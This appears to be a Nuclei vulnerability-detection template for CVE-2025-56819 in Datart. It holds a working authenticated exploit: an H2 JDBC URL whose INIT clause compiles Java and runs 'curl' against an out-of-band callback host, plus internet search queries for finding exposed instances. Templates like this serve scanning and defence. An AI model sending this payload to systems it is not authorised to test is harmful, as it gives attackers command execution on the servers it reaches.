id: CVE-2025-56819

info:
  name: Datart v1.0.0-rc.3 - Remote Code Execution
  author: Redmomn
  severity: critical
  description: |
    Datart v1.0.0-rc.3 contains a vulnerability that allows remote attackers to execute arbitrary code via INIT connection parameters.
  reference:
    - https://github.com/advisories/GHSA-623q-jr4p-f87c
    - https://github.com/xyyzxc/CVE-2025-56819
    - https://nvd.nist.gov/vuln/detail/CVE-2025-56819
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-56819
    epss-score: 0.11188
    epss-percentile: 0.93687
    cwe-id: CWE-78
    cpe: cpe:2.3:a:running-elephant:datart:1.0.0:rc3:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: datart
    product: datart
    fofa-query: 'title="Datart"'
    shodan-query: 'title:"Datart"'
    hunter-query: 'web.title="Datart"'
  # "authentication": the login step below needs valid Datart credentials.
  # "oast": the only positive signal is an out-of-band interactsh callback.
  tags: cve,cve2025,datart,rce,h2,jdbc,oast,authentication

variables:
  # Random alias name so repeated runs do not collide on an existing H2 alias
  # and so the request is not a fixed, easily fingerprinted string.
  rand_alias: '{{rand_text_alpha(8)}}'

# Request 2 only runs once request 1's internal matcher (successful login) passed.
flow: http(1) && http(2)

http:
  # Step 1: authenticate. {{username}} and {{password}} are NOT declared under
  # `variables:`; they must be supplied at run time (nuclei -var username=... -var password=...).
  # The `authorization` response header is captured as {{token}} for step 2.
  - raw:
      - |
        POST /api/v1/users/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"username":"{{username}}","password":"{{password}}"}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "email\":", "data\":{")'
          - 'status_code == 200'
        internal: true

    extractors:
      - type: kval
        name: token
        part: header
        kval:
          - authorization
        internal: true

  # Step 2: the data-provider "test connection" endpoint accepts a caller-supplied
  # JDBC URL. With the H2 driver, the URL's INIT= parameter is executed as SQL,
  # and CREATE ALIAS compiles embedded Java, so a successful match means the
  # target process actually ran the `curl {{interactsh-url}}` command -- this is
  # an active check with a side effect on the host, not a version probe.
  # Detection on the defender side: requests to /api/v1/data-provider/test whose
  # "url" contains "INIT=" / "CREATE ALIAS" with dbType H2 are the indicator
  # (see CWE-78 and the GHSA advisory above for the vendor fix).
  - raw:
      - |
        POST /api/v1/data-provider/test HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        Authorization: {{token}}

        {
          "name": "jdbc-data-provider",
          "type": "JDBC",
          "properties": {
            "dbType": "H2",
            "url": "jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=CREATE ALIAS {{rand_alias}} AS 'void cmd_exec(String cmd) throws java.lang.Exception {Runtime.getRuntime().exec(cmd)\\;}'\\;CALL {{rand_alias}} ('curl {{interactsh-url}}')\\;",
            "user": null,
            "password": "",
            "driverClass": "org.h2.Driver",
            "serverAggregate": false,
            "enableSpecialSQL": false,
            "enableSyncSchemas": true,
            "syncInterval": "60",
            "properties": {}
          }
        }

    # Positive only on an interactsh DNS hit; the HTTP response body itself is
    # not used for the verdict (it is only captured below as `message`).
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - 'dns'

    extractors:
      - type: json
        part: body
        name: message
        json:
          - '.message'
        internal: true
# NOTE(review): the digest below was computed over the original template text
# and presumably will no longer verify after reformatting -- re-sign the
# template (nuclei -sign) if signature verification is enforced.
# digest: 4b0a00483046022100f2d6a7cc76f1eb59686242c3094bd50f4789419f608bd43f1f94d8c4d122d151022100e92b91a0e97acf9458a22dd7ff0fe1f9dc235d7a9f8fbd8fbcb8d311db868493:922c64590222798bb761d5b6d8e72950